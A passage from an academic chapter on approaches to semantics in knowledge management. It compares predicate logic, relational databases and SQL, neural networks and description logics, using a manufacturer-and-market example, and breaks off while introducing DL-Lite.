of an atomic proposition. In predicate logic, atomic propositions are expressed by means of relationships among objects of the domain, raising new possibilities to describe the internal structure of an element and to describe a set of elements by means of a common characteristic. In order to clearly introduce some notion of predicate logic, consider the first statement in the example of the previous section, which can be expressed as: Manufacturer(acme_corp) There is no sentence here and the atomic statement, which we want to state the truth of, is composed of a predicate (Manufacturer), which denotes sets of elements of the domain with the same characteristics, and a constant (acme_corp), which is a real element in the domain. Predicates and constants are two of the symbols that help building statements in predicate logic. Additional symbols are required in order to translate the second statement into a logic-based formalism: ∀x.Product(x)∃y.(Market(y) ∧ isDistributedIn (x,y) Note the writing conventions that we use: concept and property names are, respectively, capitalized and non-capitalized, with composite names rendered with medial capitals (Product, isDistributedIn). Individuals are always written lowercase, with an underscore in composite names (acme_corp). Unlike in propositional logic, the structure of the statement is less easy to follow. This formula should be read “All x which are known to be products are distributed in some y which is a market.” This example introduces variables (x, y), which act as placeholders for elements of the domain, and quantifiers. Existential quantification (∃y) expresses the existence of at least one element of the domain that satisfies a constraint: “There is at least one y that is a market.” Universal quantification (∀x) identifies a set of elements of the domain
262
that belong to one or more predicates, according to some properties: “All x that are products.” Note also that we have found two types of predicates: unary (i.e., with one argument in parenthesis) like Product(x), Manufacturer(acme_ corp) and binary (i.e., with two arguments in parenthesis) like isDistributedIn(x, y). The former type denotes concepts, that is, sets of constants that share some characteristic, while the latter denotes roles, that is, relationships between two constants. Predicates with higher arity, that is, that express a relationship among three or more constants, are also possible. Hence, besides the connectives available in propositional logic (AND, OR, and NOT), predicate logic has a richer palette of operators for describing the entities populating a domain. As in propositional logic, there are some available reasoning services, which allow one to decide the truth of a formula or a set of formulæ. Before introducing reasoning services, it is necessary to define the semantics underlying predicate logic, which is based on the concept of interpretation. Intuitively, an interpretation is an assignment of {T, F} to each formula in a set of formulæ, or in a complex formula, that permits the evaluation of the whole (complex) formula. Moreover, the same complex formula should be understood in the same way by different people or automatic systems, avoiding misinterpretations. Formally, given a non-empty set ∆, an interpretation I is defined as a pair I = (∆ I , ·I ), where ∆ I is a non-empty set called domain and ·I is a function mapping: • •
Constants to elements of the domain: aI ∈ ∆; n-ary predicate symbols to relations over the domain: PI ⊆ ∆n .
Introduction to Relational Databases The relational model constitutes the theoretical background underlying RDBMS, representing
Approaches to Semantics in Knowledge Management
the most widely implemented technology for data storage and retrieval. The relational model was formalized by Edgar Codd in 1969; the interested reader may refer to a revised version of this work (Codd, 1990) for a thorough description of the model. In a nutshell, a relation is defined by a set of typed attributes and a set of attribute values, grouped as tuples that are consistent with the attribute types. According to the set-theoretic interpretation of the relational model, a relation can be seen as a subset of the Cartesian product of the domains indicated by the attributes; on the other hand, the relational model can be seen as a twovalued propositional logic (i.e., whose variables evaluate to either true or false). Relations can be manipulated and combined by means of the set of operators constituting relational algebra. Basic operators are projection on the instance values of a subset of attributes (πa1,...,an) and selection of tuples on the basis of a condition (σc). As an example, in order to retrieve the name and price of products that are of type “refrigerator,” we may write the following formula: πname,price (σtype=‘refrigerator′ (products))
(1)
The basic pool of operators is completed by set operators, union (∪ ), difference (\), Cartesian product (×) of two relations, and the rename operator (ρa1/a2), that is a necessary formal means to execute the Cartesian product on relations whose attribute names are not disjoint. The basic set can be used to define a large number of join operations, simplifying practical applications of relational algebra. Instead of relations and tuples, database administrators are more comfortable with terms like table and row; the difference in not purely lexical because all RDBMS implementations divert from the relational model in the operational semantics they convey. As an example, table attributes in RDBMS may evaluate to NULL, a special value which indicates missing information and is handled by the system differently from tradi-
tional algebraic evaluation. Rather than relying on relational algebra, RDBMS admit the SQL (Structured Query Language) (Abiteboul, Hull, & Vianu, 1995) as the interface language for querying data base instances. SQL also extends the capabilities of the language with commands for schema creation (e.g., for creating and modifying tables), data manipulation (e.g., inserting rows), access control (i.e., specifying access rights on users), and transaction control (i.e., defining sequences of operations that allow for compensation of failures through rollback). As an example, the formula in 1 can be translated into the following SQL statement: SELECT name, price FROM products WHERE type = ‘refrigerator;’
The database system engineering also takes advantage of ER (Entity-Relation) diagrams (Chen, 1976) for structuring data according to abstractions such as generalization and aggregation. Unfortunately, these constructs (as well as n-ary relations) may not be directly translated into a relational schema that can be expressed by RDBMS; instead, a preemptive phase in database implementation takes care of restructuring the input schema, so it complies with a normal form that can be directly implemented by existing applications. In this work, we investigate the practical application semantics of knowledge base management; consequently, we drain concepts and terminology from SQL systems. Similarly, in the evaluation of the expressiveness the different formalisms allow for, we will take into account the practical capabilities of implementations. As an example, the handling of generalization hierarchies is not considered a feature of RDBMS because such hierarchies are flattened during normalization. To the extent of this work, we think a database as a structured pool of data. We do not go into details of database theory, so we point the reader to (Abiteboul et al., 1995) for a comprehensive introduction to the topic. A
263
Approaches to Semantics in Knowledge Management
database relies on a schema, which describes the ‘things’ which are stored in the database. Among different approaches to the structure of a schema, the most commonly known and commercially adopted is the relational schema, which allows one to define information in terms of multi-related records (tables). Alternative (but less used) approaches are the hierarchical one (e.g., the one used in LDAP), the network model (which permits multiple inheritance via lattice structures) the object-oriented model, and the XML-based model. The representational tool in relational databases is the table, which allows the representation of instances and relations among instances. For example, a manufacturer can be represented as in Table 1, which is an abstraction of the database table defining the manufacturer concept in order to store instance data. The first row represents the schema of the table. The database table is named Manufacturer and has three attributes: name, address, and state. The second row represents a tuple in the table. A tuple is the generic name for an n-ary relation (i.e., the relation between the concept and its attributes, where n is the number of attributes) and represents in practice one line of a table. Table 1 describes a particular instance of manufacturer, whose name is ‘Clocks Inc.,’ whose office is on the ‘5th Avenue’ in the ‘New York’ State. More formally, both a definition and an instance can
be expressed as a tuple. For example, the following is a tuple representing the manufacturer definition2: Manufacturer: name, address, state whereas the Clocks Inc. instance can be expressed as: Manufacturer(Clocks Inc., 5th Avenue, New York) In the definition of the concept, it is possible to specify the type of an attribute (e.g., integer, string, etc.) and whether it is mandatory or not. Attributes’ fillers (namely, column values) have to be of the same type. For example, the address of a manufacturer has to be a string; the state has to be a string as well or constrained to belong to a list, and so forth. A table can also express a relationship. Consider Table 2: the first row defines relation ‘provides,’ which can hold between a manufacturer and a product. Assuming ‘Digital Watch’ is an instance of product, the second row states the fact that the manufacturer named ‘Clock Inc.’ provides the product named ‘Digital Watch.’ In the real world, in order to avoid the problems related to multiple tuples with the same value (say, ‘Clocks Inc.’) for a given attribute, tuples are univocally identified within a table by keys, that
Table 1. Definition of manufacturer Manufacturer
name Clocks Inc.
address 5th Avenue
state New York
Table 2. Definition and instantiation of relation ‘provides.’ provides
264
Manufacturer Clocks Inc.
Product Digital Watch
Approaches to Semantics in Knowledge Management
is, typically numeric attributes whose values are kept unique within a table instance. Relationships between tuples from distinct tables can then be expressed by referring these attribute values as foreign keys. It is important to notice that Table 2 states a relation between two tuples, the ‘Clocks Inc.’ instance and the ‘Digital Watch’ instance. This simple database allows one to make queries, for example, to retrieve all products of a given manufacturer, retrieve all manufacturers in the state of New York, and so forth. The purpose of a relational database, especially in commercial applications, is fast querying, supported by views that are built during batch procedures. A view is a sort of virtual table containing tuples of some particular table column, with pointers to the row associated with the value, usually built to quickly locate some tuples (rows) in a table. Views simply quicken the retrieval but the application works anyway, just slower. Views can be built on any combination of attributes, which are usually the most frequently queried. We can distinguish three main actions which are performed on a database--schema construction, population, and querying. The first action is the definition of the tables and of the relations between them. During this phase some semantics is involved, especially during the establishment and statement of relations. For example, the definition of table ‘provides’ requires that the elements which populate it have to come from the manufacturer and the product table. More formally, in set theory terms, the pairs that populate the table have to be a subset of the Cartesian product obtained by coupling tuples of the manufacturer table and tuples of the product table. The same ‘semantic requirement’ will apply in the subsequent phases: population and querying. Population is the constructions of instances, tuples describing the objects which populate the database. During the population there will be a sort of type check, to control the type-correctness of the tuples populating table ‘provides.’ The querying phase involves
also the specification of properties, which introduce additional semantic operations. For example, it is possible to retrieve all the Manufacturers in the New York state. In other words, the retrieval allows one to specify constraints on the values of the tuples to be searched in a specific table or in a set of tables. OWA/CWA. The underlying assumption of RDBMS is that the world is closed. This means that, during the querying phase, if a table does not exist or is void, the result is an empty set of tuples. Static/Dynamic system. Relational databases are static systems. In this case, static means that, unlike ANN approaches, there is no training phase required for the system to work. Once the schema has been declared and populated, the system is ready to be used. Incomplete knowledge. The management of incomplete knowledge is not handled by RDBMS. A database must always be capable of retrieving the information that describes what one of its elements is; so it must have certainty about the data it stores and retrieves. It is important to notice that the main purpose of relational databases is fast querying of explicitly stated knowledge.
INTRODUCTION TO ARTIFICIAL NEURAL NETWORKS The definition of an ANN could be seen as a system of programs and data structures that approximate the operations of the human brain. They involve a large number of processes operating in parallel, each with its own small “sphere of knowledge” and access to data in its local memory. The communication among physiological neurons is carried out through the exchange of neurotransmitters. These concur to activate the action potential; therefore, they activate or not neighbor neurons. We can represent the operation of neurons by means of a logical structure, like McCulloch and Pitts already formalized back in 1943. These kinds of neurons
265
Approaches to Semantics in Knowledge Management
can be arranged in short temporal sequences. The answer of the only output neuron represents the value of truth of any represented binary logical operation on the input neurons. The weights and the thresholds are chosen so that, at every time step, a logical computation is carried out. This model of neural net allows the computation of propositional negation, conjunction (AND) and disjunction (OR). Using an identity function, a net of formal neurons computes exclusive OR (XOR) of two propositions. The Perceptron of Rosenblatt (1962) is the natural extension of the formal neuron of McCulloch and Pitts. It has the ability to estimate in parallel a variety of predicates in input and the weighted sum of the output is compared with a threshold. An appropriate choice of the interconnection weights and of the thresholds will supply the output for the correct classifications of the input. Minsky and Papert (1969) pointed out that the Perceptron was limited in its possibility of classification. It is not able, in fact, to compute the XOR unless by the introduction of hidden layers of unit between the input and output layer. Minsky and Papert could not propose a learning
rule to deal with the hidden units. A number of people have since independently discovered the learning rule for a multi-layered Perceptron network. The first one to discover the generalized delta rule, or back-propagation algorithm was Werbos in 1974 (Werbos, 1994). Consequently, this particular neural network becomes a dynamic system with feedback in which there are states that can be seen like binary words of n bits. These states are evoked from classes of stimuli and so they become the representation of these classes. Every state of the net (the dynamic system) is an instantaneous photo of such system. A dynamics sequence of the states of the net is a trajectory in the space to n dimensions of which the binary words (representatives the states of the net) are vertexes. Figure 1 shows how a generic neural network unit works. In Balkenius and Gärdenfors (1991), an artificial neural network N is defined as a 4-tuple . S is the space of all possible states of the neural network. The dimensionality of S corresponds to the number of parameters used to describe a state of the system. F is a set of state transition functions or activation functions. C is
Figure 1. A high-level view on neural networks
n
Potential
P (t ) wi xi (t ) i 2
Activation Function
u (t 1)
266
1 1 e [ p ( t ) S ]
Approaches to Semantics in Knowledge Management
the set of possible configurations of the network. G is a set of learning functions that describe how the configurations develop as a result of various inputs to the network. Two interacting subsystems in a neural network: that governs the fast changes in the network, that is, the transient neural activity, and that controls the slower changes that correspond to the whole learning in the system. ANNs have a distributed representation of knowledge (Kurfess, 1999); an item is not represented by a single symbol or a sequence of symbols, but by the combination of many small representational entities, often referred to as microfeatures. We could say that a static schema is a stable pattern of activity in a neural network. A schema α corresponds to a vector < a1 , . . . , an > in the state space S. A schema α is currently represented in a neural network with an activity vector x =< x1 , . . . , xn > means that xi ≤ ai for all 1 ≤ i ≤ n. Let α, β be two schemata. If α ≤ β, then β can be considered to be a more general schema than α, and α can thus be seen as an instantiation of schema β. Semantics in ANN. According to Healy and Caudell (2006), concepts are symbolic descriptions of objects and events, observable or imagined, at any arbitrary level of generality or specificity. They are organized as a multi-threaded hierarchy ordered from the abstract to the specific. In this context, the semantics of a neural network can be expressed as an evolving representation of a distributed system of concepts, many of them learned from data via weight’s adaptation. To build a class we usually use definitions or constraints, which are conditions to be satisfied, or better they are features and attributes of the same classes. Classes are composed of members representing a specific domain. ANNs create sub-symbolic class relations strongly related to the particular described domain. These kinds of relations are embedded into the dynamical system structure. This dynamical system architecture is a model of described and learned domain.
OWA/CWA. A clear distinction between closed world assumption and open world assumption in the field of ANN is not so easy. The standard models of neural networks are usually closed world systems. We could evaluate the “openness” of a neural network by first considering its physical structure: for example, if we need a variable number of nodes, we can apply a pruning approach that removes redundant units from a network (Wynne-Jones, 1991). On the other hand, we can use a fixed structure but change the amount of information in the training set. An example about learning the past tenses of English verbs can be found in Rumelhart and McClelland (1986). It is a simple Perceptron-based pattern associator interfaced with an input/output encoding/decoding network which allows the model to associate verb stems with their past tenses using a special phoneme-representation format. Static/dynamic system (Learning and relational semantics). The process of learning modifies the structure of the weights in the neural network in order to maximize the number of constraints that are satisfied. In this way, ANNs catch the constraint structure of the particular modeled context, so we can say that it has ”learned” the relational semantics of that domain. This point of view shows that semantics is a kind of Gestalt that organizes data into a coherent structure. The understanding of meaning could consist of the emergence of coherence starting from a chaotic initial state through a phase transition. Even Balkenius and Gärdenfors (1991) have shown that, by introducing an appropriate schema concept and exploiting the higher-level features of the resonance function in a neural network, it is possible to define a form of non-monotonic inference relation. So, “truth” in ANNs consists of the dynamic state in which a node is active or not, that is, the truth embedded into the knowledge state of the system. The particular dynamic system represented by a specific ANN structure is the model of the learned domain. Typically, a neural network is
267
Approaches to Semantics in Knowledge Management
initially “trained” with large amounts of data and rules about data relationships. One of the most important features of a neural network is its ability to adapt to new environments. Therefore, learning algorithms are critical for the study of neural networks. Learning is essential to most of these neural network architectures and hence the choice of the learning algorithm is a central issue in the development of an ANN. Learning implies that a processing unit can change its input/output behavior as a result of changes occurred in the environment. Since the activation functions are usually fixed when the network is constructed and the input/output vector cannot be changed, the weights corresponding to that input vector need to be adjusted in order to modify the input/output behavior. A method is thus needed at least during a training stage, to modify weights in response to the input/output process. A number of such learning functions are available for neural network models. Learning can be either supervised, in which the network is provided with the correct answer for the output during training, or unsupervised, in which no external teacher is present. MLP (Multiple Layer Perceptron) training algorithms are examples of supervised learning using the EBP (Error BackPropagation) (Rumelhart & McClelland, 1986). EBP is a gradient descent algorithm that uses input vectors and the corresponding output vectors to train a multiple layer network until it can approximate a given function. It was proved that MLPs, which are networks with biases, a sigmoid layer, and a linear output layer, can approximate any function with a finite number of discontinuities. Kohonen’s Self-Organising Maps (Kohonen, 2000) are based on non-supervised learning. The preservation of neighborhood relations is a very useful property that has attracted a great interest, for which similar input patterns from the input space will be projected into neighboring nodes of the output map, and conversely, nodes that are ad-
268
jacent in the output map will decode similar input patterns. All self-organizing networks have been generally considered as preserving the topology of the input space, and this is the consequence of the competitive learning. However, by following recent definitions of topology preservation, not all self-organising models have this peculiarity. Incomplete knowledge. After learning, every input data given to the ANN is classified, even if it was never seen before or if there is no evident relation with already present elements. So, incomplete knowledge can not be discovered in ANNs. For example: if we want to build a suitable model of neural network that represents the concept of “Monopoly” within our sample scenario, we can choose among different neural network architectures. We decided to use a Multilayer Perceptron that models the relation among the different instances of article, products, Manufacturers, and so on. The learning algorithm of the MLP is represented by Equation 2, as presented in Rumelhart and McClelland (1986).
−
∂E ∂wij
−1
(2)
The minimum error (E) obtained during the training depends on a suitable learning rate (η) and momentum (α). Once completed the training, it is necessary to test its effective ability to recognize concept Monopoly. The training set will be represented by all the instances of TargetMarket [Country code, Product Code, Manufacturer]. So, when we minimize the error on the association training set of TargetMarket and typology of monopoly, we will have a model of this kind of concept embedded in the Perceptron structure. Moreover, this model can associate, after the training phase, a new instance of TargetMarket (never seen before) to one of the class of Monopoly. In this way, a neural network is able to fill missing information.
Approaches to Semantics in Knowledge Management
INTRODUCTION TO DESCRIPTION LOGICS
in the KB. It is worth noting that the very core of a DLS is its ability to correctly reason over the data contained in the knowledge base. Before describing the components of a DLS, we give an overview of concept languages. Concept languages. Like every language, a concept language consists of a syntax, which encompasses constructors that allow to link elements or sets of elements in the domain. Concept languages allow to write axioms (assertions over elements or sets of elements in the domain) to define concepts and roles (i.e., properties of concepts and relationships among concepts), which are aggregates of elements in the domain, and to make assertions about single elements (called also individuals or instances) of the domain. Concepts are defined by unary predicates and roles by binary predicates and can be either atomic or complex. Here are some examples.
DLs are a family of languages for knowledge representation and reasoning. Technically, they are defined as a decidable fragment of First Order Logic (Kelly, 1997), restricted to unary and binary predicates. We briefly introduce here the basic concepts underlying DLs: components, syntax, semantics, and reasoning. We point the interested reader to the Description Logic Handbook (Baader, Calvanese, McGuinness, Nardi, & Patel-Schneider, 2003) or to the bibliography for a deeper presentation. Components of a DLS (Description Logic System). The three main components of a DLS are depicted in Figure 3. A KB is a set of assertions (also called statements or axioms) about a domain, defined by means of concepts (a.k.a. classes), roles (a.k.a. properties), and relationships; it can be described in DLs by means of a concept language. The axioms are written in a concept language, and are organized in a TBox and in an ABox, the former containing the described domain structure, and the latter containing real objects. Reasoning services allow one to deduce additional information from the knowledge stored
TargetMarket Market. “A target market is a particular type of market” or, more technically, “The set of all target markets is contained in the set of all markets.” Article ≡ Product ∃ hasName ∃ hasSalePrice. “An article is a kind of product, and it has a name and a sale price”. Product is an atomic concept (i.e., it is not defined in
1.
2.
Figure 2. Multilayers perception modelling the concept “monopoly”
W2ij
W1ij
H1
X1
Output Layer
O1
Hidden Layer
H2
X2
X3
Input Layer
269
Approaches to Semantics in Knowledge Management
Figure 3. The components of a description logic system
Knowledge Base ∑
TBox
ABox
Output
Reasoning Services Description Logic System
3.
4.
5.
terms of other concepts). Article is a complex concept, hasName and hasSalePrice are roles. isDistributedIn.Market, isDistributedIn−. Article. This is more subtle, but it basically says “An article is sold in a market”. It expresses explicitly the range (Market) and domain (Article) of role isDistributedIn, although one would better write it as Article ≡ ∃ isDistributedIn.Market. The value after the,” (e.g., in isDistributedIn.Market it would be Market) is called filler of the property. The superscript − denotes the inverse property. The DL syntax indeed only allows one to specify the filler (i.e., the range) of a property and not its domain. Product(cell_ phone). “Cell phone is a Product,” or “Cell phone is an individual of type Product.” isDistributedIn(cell_ phone, italy). “Cell phone is sold in Italy.” Note the difference in the syntax between the definition of the role isDistributedIn above and its instantia-
tion here. TBox and ABox. The TBox contains the intensional knowledge, which is general knowledge concerning the domain of discourse, fixed in time and usually not subjected to changes. The TBox contains terminological axioms, that is, axioms that define concepts and roles, like in examples 1-3 above. The ABox contains the extensional knowledge, which concerns specific elements of the domain, and might change over time. The ABox contains assertional axioms, that is, that describe and represent assertions about individuals in the domain, like in examples 4-5 above. TBox and ABox form the KB, denoted by Σ = (T , A), where T is the TBox and A the ABox. Although knowledge bases and databases may seem very similar from a structural point of view, with the tables of a RDBMS resembling the TBox and the tuples of each table resembling the actual data contained in the ABox, there are a lot of differences from a conceptual point of view that we will show with the following example.3 T = {Article ≡ Product isProducedBy.Company
270
Approaches to Semantics in Knowledge Management
hasName hasSalePrice ≥1 isDistributedIn.TargetMarket, Product ≡ isProducedBy.Manufacturer ≥1 isReselledBy.Reseller ≥1 isDistributedBy.Distributor ≥1 isDistributedIn.Market Market Country, TargetMarket ≡ Market hasCurrency, Consumer ≡ ∃ buys.Article, Company ≡ ∃ Provides} A = {provides(acme_corp, anvil), provides(acme_ corp, rockets), provides(logistics_inc, transportation), Manufacturer(clocks_inc), Supplier(logistics_inc), buys(will, anvil), buys(lisa, toaster), buys(pauline, digital_watch), buys(john, chronograph)} A KB also contains the so-called “implicit knowledge,” information not explicitly stated, but that can be logically deduced by the existing knowledge. Implicit knowledge can be discovered with the help of reasoning services, for example in the answer to a query posed by a user to the system. A reasoning engine (called reasoner) also provides additional inference services: depending on the input and on the goal, the system carries out different processes. Hence, it is immediately seen that, unlike in RDBMS, it is not necessary to explicitly state neither that anvil, toaster, digital watch, and chronograph are articles, nor that Will, Lisa, Pauline, and John are consumers, since these conclusions are automatically derived from the definition Consumer = buys.Article (“A customer is someone who buys an article”) relation: since the filler of role buys is Article, then every second argument of the relation buys is automatically derived to be an element of the set Article. The same applies to Consumer: since it is defined as someone who buys an article, then every first argument in the relation is derived to be an element of the set Consumer. Note also
the difference in the definition of Consumer and Company: they are both valid, but the former represents someone who buys an article, whereas the latter represents an entity that provides something. This causes the inability of deriving additional information on the filler of role provides. We know that a company provides something, but we do not know what. We might discover subsequently that a company provides Goods, so we can modify in our knowledge base the actual axiom to Company ≡ ∃ provides.Good. Semantics of DL Languages. We will denote with ∆ the domain of discourse, with × the Cartesian product of two generic sets and with the subsumption relation (i.e., relations between super- and subclasses) between Concepts or Roles. The semantics of DL languages is given in terms of an interpretation, defined as a pair I = (∆ I, ·I ), where ∆ I is a non-empty set called domain and the interpretation function ·I is a mapping from every Concept to a subset of ∆ I, from every Role to a subset of ∆ I × ∆ I and from every Individual to an element of ∆ I. An interpretation I is a model for a Concept C if the set CI is non-empty. Besides those presented in the beginning of this section, DLs provide many additional connectives, also called constructors, each of which has its own semantics, so that it can be uniquely interpreted. The basic constructors, AND, OR, and NOT have the same interpretation as in predicate logic: the conjunction of two or more concepts (i.e., concepts related by AND), evaluates to true if and only if all the concepts are true, and similar arguments apply to disjunction (OR) and negation (NOT). Additional constructors provided by DLs include inverse roles, (qualified) number restrictions, and functionality. Inverse roles are roles with their arguments swapped, for example producedBy (like in “A product is produced by a manufacturer”) and produces (“A manufacturer produces a product”). Number restrictions allow to specify how many values of a particular role can be specified for a concept, it is also called
271
Approaches to Semantics in Knowledge Management
cardinality restriction and can be specified as an exact restriction, as an at-least restriction, or as an at-most restriction, meaning that the value allowed is either an exact value (i.e., the one given in the restriction), or it must be at least or at most equal to the given one. •
•
•
A national article is distributed in exactly one target market. NationalArticle ≡ =1isDistributedIn.TargetMarket An article is distributed at least in ten target markets. Article ≡ ≥10 isDistributedIn.TargetMarket An exclusive article is distributed in at most three target markets. ExclusiveArticle ≡≤3 isDistributedIn.TargetMarket
Functionality is a particular characteristic of a role that allows one to uniquely identify the filler for that role when describing a given individual. Formally, given a functional role R and individuals x, y, z, if R(x, y) R(x, z), it follows necessarily that y = z. For example, you may want to constrain each company to have only one CEO (Chief Executive Officer), so that whenever you talk about this company, its CEO is uniquely identified. Now, suppose that role hasCEO is functional, and you have the following axioms. hasCEO(acme_corp, john_smith) hasCEO(acme_corp, john_h_smith) There are two possibilities to read these two axioms: either John Smith and John H. Smith are the same person, or your knowledge base is inconsistent, since functionality forbids that ACME Corp. (and every other company) has more than one CEO. Reasoning. A DL system provides many basic inference services. Here we present some of them, and we sketch out how they are used to build some
272
more complex ones. 1.
2.
3. 4.
Subsumption: decide whether a concept is more general than another. Upon Subsumption, the process of Classification is built, which is the process that builds the hierarchy of the concepts in the TBox T. Consistency Check: decide if Σ is satisfiable, that is, if it is coherent and admits a model. Concept Satisfiability: decide if a concept C is satisfiable in a KB Σ. Instance Checking: decide if an instance C(a) is satisfied in every model of Σ. On Instance Checking in based the process of Retrieval or Query Answering: given a KBs Σ and a concept C, find the set of all instances C(a) in Σ.
Static and dynamic systems. We have already noted that a KB stores two types of knowledge: intensional and extensional. The former is also said timeless, since it is unlikely to be changed. DLs and KB are indeed suitable for describing domains that can evolve over time, but only at the ABox level, that is, assertions on individuals and not on the structure stored in the TBox: the TBox is designed in a way that it hardly can be changed. Description Logics Systems are therefore static systems: they can not automatically update the TBox, as this implies the redefinition of an existing concept (see (De Giacomo, Lenzerini, Poggi, & Rosati, 2006)): only the interaction of the user can modify a concept. Note also, that the literature about updates w.r.t. the ABox is very limited (investigated in (Liu, Lutz, Milicic, & Wolter, 2006)), and also ontology evolution (i.e., ontology update w.r.t. the TBox) is almost uninvestigated (an exception is (Haase & Stojanovic, 2005)). Management of incomplete knowledge. We have already seen that in a RDBMS what is not explicitly stated in a table is considered false: true is only the knowledge carried by the tuples. For example, if there is no tuple in a table that
Approaches to Semantics in Knowledge Management
states “ACME Corp. is a supplier,” then no query for suppliers to the RDBMS will return ACME Corp. as a result. This is what is called Closed World Assumption. In KBs, however, the answer to the same query might have a result, as it could be inferred from other statements that ACME Corp. is in fact a supplier. The following statements can, in fact, do the job: “A supplier provides manufactured goods” and “ACME Corp. provides anvils”. From them we can infer that ACME, Corp. is a supplier, and that anvils are a type of manufactured goods. Another difference between KB and RDBMS is in the management of incomplete knowledge in a domain. To understand what it is intended with incomplete knowledge, suppose that in our database we already have three tables: Supplier, Manufacturer, and Reseller. Consider the following example, composed of two statements: ACME Corp. is not a reseller. ACME Corp. is a supplier or a manufacturer. These statements clearly define the concept of ACME Corp. as being either a supplier or a manufacturer, but not a reseller, but it is not straightforward how to represent this in our RDBMS. We cannot insert a tuple in any of the three tables of our database: we have to deal with information that does not exhaustively specify what ACME Corp. actually is. To do so, it is necessary to define what ACME Corp. is. It can be possible to represent that ACME Corp. is not a reseller, for example creating a NotReseller table, with appropriate foreign keys and constraints that check for an element of this table not to be in the Reseller table. More complicated is to represent the concept of ACME Corp. being either a supplier or a manufacturer, for which an exact representation might be impossible. However, statements like these are common in knowledge representation and the ability to deal with them is substantial: one should be able to express what an individual in the domain is not,
rather than explicitly tell what it is. Hence, in a DL that allows for negation and disjunction, the two statements can easily be represented as: ¬Reseller(acme_corp) Supplier(acme_corp) Manufacturer(acme_ corp) In a Description Logic that has no support for negation or disjunction,4 the two statements can not be represented either. Open and Closed World Assumption. The Closed World Assumption and the Open World Assumption represent two different approaches in how to evaluate knowledge in a knowledge base. The difference in their behaviour is usually clarified by a comparison between the structure of a KB Σ = (T, A), and a relational database, where the schema of the latter (i.e., its tables and structure) roughly corresponds to T and its tuples correspond to A. The difference is that, on the one side, we have a single RDBMS instance, which represents the only possible interpretation of the stored data, while on the other we have one out of all possible interpretations of Σ. Hence, while in a RDBMS if information is not explicitly stated in a tuple, it is interpreted as “negative” or false knowledge, in a knowledge base it is considered false only if it contradicts some other axioms in the domain. The difference between the two behaviours is better seen with the help of an example. An example of OWA and incomplete knowledge. Suppose you want to model a very simple scenario, where companies are either manufacturers or suppliers, but not both, and nothing else can be a company. This situation is formalised in Description Logics with the formulæ: T = { Company ≡ (Manufacturer Supplier), Manufacturer Supplier ⊥} At a first glance, it might seem straightforward to represent the same scenario in a RDBMS, for example, with a table Company with two columns,
273
Approaches to Semantics in Knowledge Management
one with the name of the company and one that shows whether it is a manufacturer or a supplier with an appropriate flag. This table can be created with a SQL statement: CREATE TABLE Company ( name String NOT NULL PRIMARY KEY, type ENUM (’Manufacturer’, ’Supplier’) NOT NULL) Even when we start populating both the KB and the RDBMS with the same complete data, for example, with the information that ACME Corp. is a Manufacturer, everything seems correct. The ABox of the KB will contain an axiom and the RDBMS will have a table. A = {Manufacturer(acme_corp)} Company ACME Corp. Manufacturer
However, a prominent difference is going to become apparent when we want to represent in both the KB and the RDBMS some particular kind of data. For example, suppose we know that ACME Corp. is a company, but we do not know whether it is a manufacturer or a supplier. In a KB, we need only to add to the ABox the statement Company(acme corp), but when we want to insert that information in the Data Base, the lack of knowledge about ACME Corp. being a manufacturer or a supplier forbids that tuple to be inserted in the table, since one of the mandatory attributes ‘Man’ or ‘Sup” is missing.
INTEGRATION EFFORTS Currently, data bases aggregated from heterogeneous data sources (such as those in the EE scenario) are typically stored into large RDBMS, which can store and retrieve data with extreme
274
efficiency. However, a user or a manager in the EE is facing two challenging tasks when trying to access different data sources (e.g., RDBMS, KBs, or other structured data). On the one hand, keeping the integrity of data bases may result not a trivial process; on the other hand, querying data aggregated from different sources might be impossible. Since consistency and other reasoning services are tasks that in DLs come for free, and since storage and retrieval systems like RDBMS provide the best performances, many efforts have been devoted in the last few years to investigating frameworks that allow to use DLs KBs and RDBMS together, exploiting their strengths and reducing their weaknesses. In this section, we present two popular approaches to information integration: DL-Lite, a framework that helps using DLs reasoning services to query data stored into relational databases, and hybrid reasoning frameworks, combining closed world reasoning on top of knowledge bases with open world reasoning.
Expressiveness and Performance With DL-Lite We have seen that both RDBMS and DLs have drawbacks in their use: RDBMS do not allow for reasoning, have a loose support for logical consistency, a basic form of which is obtained by means of (possibly complex) integrity constraints and triggers, and have low expressiveness. Nevertheless, DLs are not tailored to manage large ABoxes (i.e., large amounts of data) since this requires to reason also with concept definitions, that is, with the TBox, and may have an extremely high computational complexity, depending on the constructors used. Moreover, the understanding of the formalism can be challenging. In the last decade, investigation in the field of Description Logics has been developed in two main directions. •
Following the increasing demand for expres-
Approaches to Semantics in Knowledge Management
•
sive languages in both KR and the SW, the limits of expressiveness and computational complexity were pushed forward to the definition of new algorithms for very complex DLs, like for example SROIQ (Horrocks, Kutz, & Sattler, 2006), which is the base of the proposed revision 1.1 of the Web Ontology Language (OWL5). We will not cover this development branch since we are more interested in the integration between RDBMS and DLs than in the investigation of very expressive languages. A lot of efforts have been devoted to identifying simpler languages that, although limited in expressiveness, are useful for some specific applications. In this section, we focus our attention on a family of DLs, called DL-Lite (Calvanese et al., 2005), which offers interesting characteristics for information integration, in order to tackle the drawbacks presented at the beginning of this section. In particular, DL-Lite has the ability to exploit RDBMS technologies for storing large amounts of data, to check the data consistency, provided by logical inference, and can express complex queries to the RDBMS, translating formal queries into SQL queries.
Especially in the Semantic Web community, KBs (commonly called ontologies) have been employed not only as a means for describing domains, but also as a conceptual view over data, that is, as an abstract means for interpreting the structure of the domain underlying instance data that are stored in a relational database. Semantic Web technologies are not yet widely used for storing axioms of knowledge bases, indeed, and developers tend to use RDBMS, which are more mature, as ontology repositories. The use of ontologies as a conceptual view can also help addressing other issues that are related with the continuously rising needs for information integration and access. Suppose you have
